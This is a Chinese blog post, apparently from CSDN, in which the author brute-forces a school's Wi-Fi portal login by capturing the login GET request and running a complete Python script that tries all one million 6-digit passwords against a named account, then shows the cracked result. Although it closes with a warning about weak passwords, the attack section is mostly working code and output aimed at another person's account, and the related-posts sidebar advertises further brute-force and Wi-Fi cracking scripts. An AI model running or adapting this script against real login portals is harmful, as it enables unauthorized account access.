python脚本-暴力破解无线网弱密码

最新推荐文章于 2024-05-16 11:09:42 发布
最新推荐文章于 2024-05-16 11:09:42 发布
阅读量2.2k 收藏 7
点赞数 1
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Osumail/article/details/105967294
版权

关注我的博客,访问更多内容!

背景:学校最近重新架设无线网一体化,而初始密码为弱密码(6位数字),下面我们要做的就是通过暴力破解的方式破解弱密码!(所以建议大家以后无论是在注册还是什么情况,都千万不要使用弱密钥)
攻击过程如下:

1.获取get参数

在爆破之前我们需要获取一些get参数,这些参数应该包含着我们输入的登陆信息。

登陆无线网前需要在网页上进行身份验证。
在这里插入图片描述

随便输入一个账号密码,看返回结果是什么。比如输入学号:1122,密码:1231131,运营商选择联通。提示无账号,但是无所谓,毕竟我们的目的在于接下来的抓包环节。抓包看看get的网址,选择我们有用的,比如下图中get参数中包含了我们输入的信息。这很有用,因为这为我们下面的python脚本提供了url。
获取输入的get参数
看一下回显结果,提示"result":"0"等信息。
验证失败回显内容
我们再输入一个正确的账号密码,将get参数中的user_account和user_password换成正确的(我自己的无线网认证账号密码,账号和密码就不公布了hhhhh),看一下正确登陆后的回显内容。显示"result":"1","认证成功"等信息。
验证正确回显内容
ok,我们可以根据回显内容的不同来判断是否验证成功。下面就可以进行暴力破解了,只需要选定一个存在的账号,然后穷举6位数字密码的所有可能性,一一验证即可。

python脚本暴力破解

直接上代码吧:

from time import strftime
from itertools import product
from time import sleep
import requests
from requests import post
import re
import threading    #可开启多线程
import time
 
def fx(iter=['0123456789']):
  def psgen(x):    #密码生成器,穷举所有的密码可能性,参数x表示密码长度
    for r in iter:
      for repeat in range(x,x+1):
        for ps in product(r,repeat=repeat):
          yield ''.join(ps)
  for ps in psgen(6):
    url='http://10.2.5.251:801/eportal/?c=Portal&a=login&callback=dr1556270398016&login_method=1&user_account=08xxxx05@unicom&user_password=%s&wlan_user_ip=10.3.37.27&wlan_user_mac=d07e351e9bbe&wlan_ac_ip=&wlan_ac_name=NAS&jsVersion=3.0&_=1556270388759'%ps
    try:
      s=requests.session()
      rs=s.get(url).content.decode('utf-8')
      r = re.findall(r'认证成功',rs)        #判断验证结果
      if r: 
        with open("resut.csv","a+") as f:    #存储密码结果到result.csv文件中
          f.write('密码破解成功结果为:,'+ ps + ',' + strftime("%c") + ',' + url+'\n')
        print('密码破解成功:'+ps+' ,'+rs)
        break
      else:
        print(ps+'密码不正确'+rs)
    except:
      sleep(1)
      pass
      
fx(['0123456789'])

接下来运行等待结果就ok了。看一下运行过程图:
在这里插入图片描述

由于一共的可能性有1000000种,而且每一次穷举都要进行一次网络验证,即每一次验证都有网络延时,所以要等上一会儿。大概爆破了一个多小时,终于爆出了正确结果。生成了result.csv文件,查看一下文件内容,如下所示:

密码破解成功结果为:,15xxxx,Fri Apr 26 17:28:19 2019,http://10.2.5.251:801/eportal/?c=Portal&a=login&callback=dr1556270398016&login_method=1&user_account=08xxxx05@unicom&user_password=15xxxx&wlan_user_ip=10.3.37.27&wlan_user_mac=d07e351e9bbe&wlan_ac_ip=&wlan_ac_name=NAS&jsVersion=3.0&_=1556270388759

速度慢可以开启多线程,同时进行测试。结果好很多!

爆破完成,由此看见,弱密钥的危险性。如有错误或建议,请在评论出指出!
Osumail
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python爆破示例_用python爆破某会员网站
weixin_33335559的博客
01-12 626
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
Python牛刀小试密码爆破
12-23
难道真的要我破解一个么?算了,正好试试我的Python水平。 python版 复制代码 代码如下: #coding: gbk import httplib, urllib def Check(username, password): params = urllib.urlencode( {‘userid’: username, ‘passwd’: password}) headers = {“Content-type”: “application/x-www-form-urlencoded”} conn = httplib.HTTPSConnection(“www.bdwm.net”) con
Python脚本暴力破解栅栏密码
01-21
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result = {x:‘‘ for x in range
WiFi破解脚本 wifiphisher
04-24
wifi破解脚本 希望志同道合的同志一起研究 我先研究一下 看看好不好用 后面大家一起交流学习啊
Python暴力破解密码
we chat:玩转测试开发
02-13 1万+
简介:暴力破解密码的方式一般是枚举法进行破译尝试,通过一次次不同的输入尝试从而得出最终的密码,所以密码的长度和复杂性就尤为重要。本文仅以范例,警示大家在创建密码的时候,应当尽量选择组合复杂度高的,有一定长度的密码,而不是123456之类的简单密码。 破解的思路: 1、获取目标密码长度,一般为4,6,12,15,18位长度。 2、获取目标密码组成的范围,一般为数字,小写字母,大写字母,特殊符号 3、组装密码,通过itertools模块组装。Python:常见排列组合问题处理 4、枚举破译。 例如生活中最常见的
Python暴力破解附近局域网WiFi密码
y1282037271的博客
02-27 6218
本文将记录学习下如何通过 Python 脚本实现 WIFI 密码暴力破解,从而实现免费蹭网。
利用Python暴力破解邻居家WiFi密码
热门推荐
weixin_45841831的博客
01-19 3万+
如觉得博主文章写的不错或对你有所帮助的话,还望大家多多支持呀!
破解隔壁wifi的实践——python脚本
qq_58832911的博客
05-02 9586
两种思路的方法: 1,python脚本密码 2,网络攻击,抓取握手包,解包。 本篇博客介绍python脚本密码
python获取WiFi列表,根据密码本穷举破解,Windows
SammeryD的博客
12-13 5356
python获取WiFi列表,根据密码本穷举,Windows 后附密码本 结果还是看运气 单次连接时间自由调整:我自己测试时1秒够了 #wifi连接时间 time.sleep(1) import subprocess import pywifi from pywifi import const import time #测试连接,返回链接结果 def wifiConnect(pwd,name): #抓取网卡接口") wifi=pywifi.PyWiFi() #获取第一个无线网卡"
Python爬取破解无线网络wifi密码过程解析
09-18
主要介绍了Python爬取破解无线网密码过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
python暴力破解蓝奏网盘密码.zip
06-28
python暴力破解蓝奏网盘密码 输入地址,提交延迟时间,和字典文件,即可开始
Python实现在线暴力破解邮箱账号密码功能示例【测试可用】
01-20
本文实例讲述了Python实现在线暴力破解邮箱账号密码功能。分享给大家供大家参考,具体如下: dic 字典格式如下(mail.txt) : [email protected]:password [email protected]:password [email protected]:password...
python暴破Linux用户密码
我是齐潇啊
03-08 1393
1.必备知识 1.1Linux用户密码存放 路径:/etc/shadow 格式:以“:’为分割号 账号名称:密码(已经经过编码,*就是没有密码):最近更改密码日期:密码不可改动的天数:密码需要改动的天数:密码需要改动期限前的警告天数:密码过期宽限天数:账号失效日期:保留 1.2密码格式 $X$salt$encode X:使用的哈希算法,1是MD5,5是SHA-256,6是SHA-512 salt:盐值,用来给密码加密的 encode:hash值,是由密码和盐值加密后得到的 举个例子.
python+selenium模拟网页登录摄像头web页面,实现口令爆破
CYgj000的博客
05-31 1631
使用python+selenium模拟网页登录操作,从而实现爆破登录前言一、使用场景二、使用步骤1.引入库2.创建浏览器对象3. 利用password.txt中的口令逐条尝试三、实现效果 前言 这是我第一次在CSDN中写下文章,对于文章本身,只是用于记录我在日常学习中的点点滴滴,非常开心能与大家分享。 一、使用场景 我模拟登录的是一款Amcrest的摄像的web登录界面,界面很简单,只有两个输入框,分别是用户名和密码。 摄像头的型号为IP2M-841B,这款摄像头默认初始用户名、密码都是admin,
python暴破服务器用户密码
qq_69613156的博客
11-08 784
python写个脚本,暴破web服务器里面的用户名及密码信息。包括已知用户名情况,和未知用户名情况。
Python攻防之口令、自定义字典生成及网站暴库防护!
爬遍所有网站
03-26 1333
免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 第十五篇第八张黑底程序图出现了错误更正为: 作者介绍:杨秀璋 自幼受贵州大山的熏陶,养成了诚实质朴的性格。经过寒窗苦读,考入BIT,为完成自己的教师梦,放弃IT、航天等工作,成为贵财一名大学教师...
python 写的http后台口令爆破工具
byteway的专栏
12-12 6147
利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很容易被口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
python(环境安装)搭建、pycharm安装、背景改为白色详细文章
2301_77161927的博客
05-13 393
python(环境搭建)安装、pycharm安装、背景颜色改为白色。
python学习-使用pandas库分析excel表,并导出所需的表
最新发布
SixSix的自留地
05-16 100
使用pandas库分析excel表中多个子表的数据
python aes 暴力破解脚本
05-01
暴力破解AES加密的密文需要大量的计算资源和时间,不是一般的脚本可以完成的。而且,暴力破解也不是一种良好的安全实践,因为它会暴露你的密码和密钥,而且可能会导致数据泄露和其他安全问题。 建议您不要使用暴力破解,而是使用更安全和可靠的加密方式和密钥管理方法来保护您的数据。 如果您仍然坚持需要编写AES暴力破解脚本,可以参考以下示例代码: ```python import itertools from Crypto.Cipher import AES # 定义加密算法 def encrypt(key, plain_text): cipher = AES.new(key, AES.MODE_ECB) return cipher.encrypt(plain_text) # 定义密文 cipher_text = '3f3b3a8b7d1b3a9f3f3b3a8b7d1b3a9f' # 定义密钥范围 key_range = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' # 枚举密钥并进行破解 for key_length in range(1, 9): for key in itertools.product(key_range, repeat=key_length): key = ''.join(key).encode('utf-8') result = encrypt(key, b'hello world').hex() if result == cipher_text: print('Found key: ', key) break ``` 该脚本使用了Python的itertools库来枚举密钥范围,然后使用Crypto库的AES模块进行加密。请注意,该脚本只是为了演示目的,实际上这种方式不太可能破解出AES加密的密文。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值